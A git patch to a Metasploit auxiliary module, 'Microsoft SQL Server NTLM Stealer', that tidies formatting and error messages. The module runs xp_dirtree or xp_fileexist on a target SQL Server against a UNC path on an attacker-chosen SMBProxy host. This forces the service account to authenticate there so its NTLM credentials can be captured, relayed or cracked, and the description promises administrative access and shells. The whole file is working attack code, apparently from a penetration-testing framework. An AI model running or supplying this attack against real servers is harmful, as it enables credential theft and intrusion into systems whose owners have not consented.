From fafa6e49ce0389dd949a471cbd46419d5e114930 Mon Sep 17 00:00:00 2001 From: nullbind Date: Tue, 16 Oct 2012 12:10:37 -0500 Subject: [PATCH] address comments from jvazquez --- .../admin/mssql/mssql_ntlm_stealer.rb | 101 ++++++++---------- 1 file changed, 47 insertions(+), 54 deletions(-) diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 7f045972d9..55a299c7ff 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -1,39 +1,37 @@ require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL - include Msf::Auxiliary::Scanner - include Rex::Text - + include Msf::Auxiliary::Scanner + include Rex::Text + def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server NTLM Stealer', 'Description' => %q{ - - This module can be used to help capture or relay the LM/NTLM - credentials of the account running the remote SQL Server service. - The module will use the supplied credentials to connect to the - target SQL Server instance and execute the native "xp_dirtree" or - "xp_fileexist" stored procedure. The stored procedures will then - force the service account to authenticate to the system defined in - the SMBProxy option. In order for the attack to be successful, the - SMB capture or relay module must be running on the system defined - as the SMBProxy. The database account used to connect to the - database should only require the "PUBLIC" role to execute. - Successful execution of this attack usually results in local - administrative access to the Windows system. Specifically, this + This module can be used to help capture or relay the LM/NTLM + credentials of the account running the remote SQL Server service. + The module will use the supplied credentials to connect to the + target SQL Server instance and execute the native "xp_dirtree" or + "xp_fileexist" stored procedure. The stored procedures will then + force the service account to authenticate to the system defined in + the SMBProxy option. In order for the attack to be successful, the + SMB capture or relay module must be running on the system defined + as the SMBProxy. The database account used to connect to the + database should only require the "PUBLIC" role to execute. + Successful execution of this attack usually results in local + administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using - a shared service account to get shells. However, if the relay fails, - then the LM hash can be reversed using the Halflm rainbow tables and - john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer - for the inspiration. + a shared service account to get shells. However, if the relay fails, + then the LM hash can be reversed using the Halflm rainbow tables and + john the ripper. Thanks to "Sh2kerr" who wrote the ora_ntlm_stealer + for the inspiration. }, - 'Author' => [ 'Scott Sutherland [at] netspi [dot] com>' ], + 'Author' => [ 'nullbind ' ], 'License' => MSF_LICENSE, 'Platform' => [ 'Windows' ], - 'References' => [[ 'URL', 'http://www.netspi.com/blog/author/ssutherland/' ]], + 'References' => [[ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ]], )) register_options( @@ -43,52 +41,47 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - - ## WARNING + + # Reminder print_status("DONT FORGET to run a SMB capture or relay module!") - ## SET DEFAULT RESULT (FAIL) + # Set default result (fail) result = 0 - - ## CALL AUTH_FORCE METHODS TO EXECUTE "xp_dirtree" AND "xp_fileexist" + + # Call auth_force method to execute "xp_dirtree" result = force_auth("xp_dirtree",datastore['SMBPROXY'],rhost,rport) - - if result == 0 then - result = force_auth("xp_fileexist",datastore['SMBPROXY'],rhost,rport) - end - - ## DISPLAY THE STATUS TO THE USER - if result == 1 then - print_good("Attempt complete, go check your SMB relay or capture module for goodies!") - else - print_error("Module failed to initiate authentication to smbproxy.") + + # Call auth_force method to execute "xp_fileexist" if "xp_dirtree" fails + if result == 0 then + force_auth("xp_fileexist",datastore['SMBPROXY'],rhost,rport) end end - - - ## -------------------------------------------- - ## METHOD TO FORCE SQL SERVER TO AUTHENTICATE - ## -------------------------------------------- + + + # -------------------------------------------- + # Method to force sql server to authenticate + # -------------------------------------------- def force_auth(sprocedure,smbproxy,vic,vicport) - + print_status("Forcing SQL Server at #{vic} to auth to #{smbproxy} via #{sprocedure}...") - - ## GENERATE RANDOM FILE NAME + + # Generate random file name rand_filename = Rex::Text.rand_text_alpha(8, bad='') - - ## SETUP QUERY + + # Setup query sql = "#{sprocedure} '\\\\#{smbproxy}\\#{rand_filename}'" - - ## EXECUTE QUERY + + # Execute query begin result = mssql_query(sql, false) if mssql_login_datastore column_data = result[:rows] - print_good("Successfully executed #{sprocedure} on #{rhost}") + print_good("Successfully executed #{sprocedure} on #{rhost}") + print_good("Go check your SMB relay or capture module for goodies!") return 1 rescue - print_error("Failed to connect to #{rhost} on port #{rport}") + print_error("#{sprocedure} failed to initiate authentication to smbproxy.") return 0 - end + end end - + end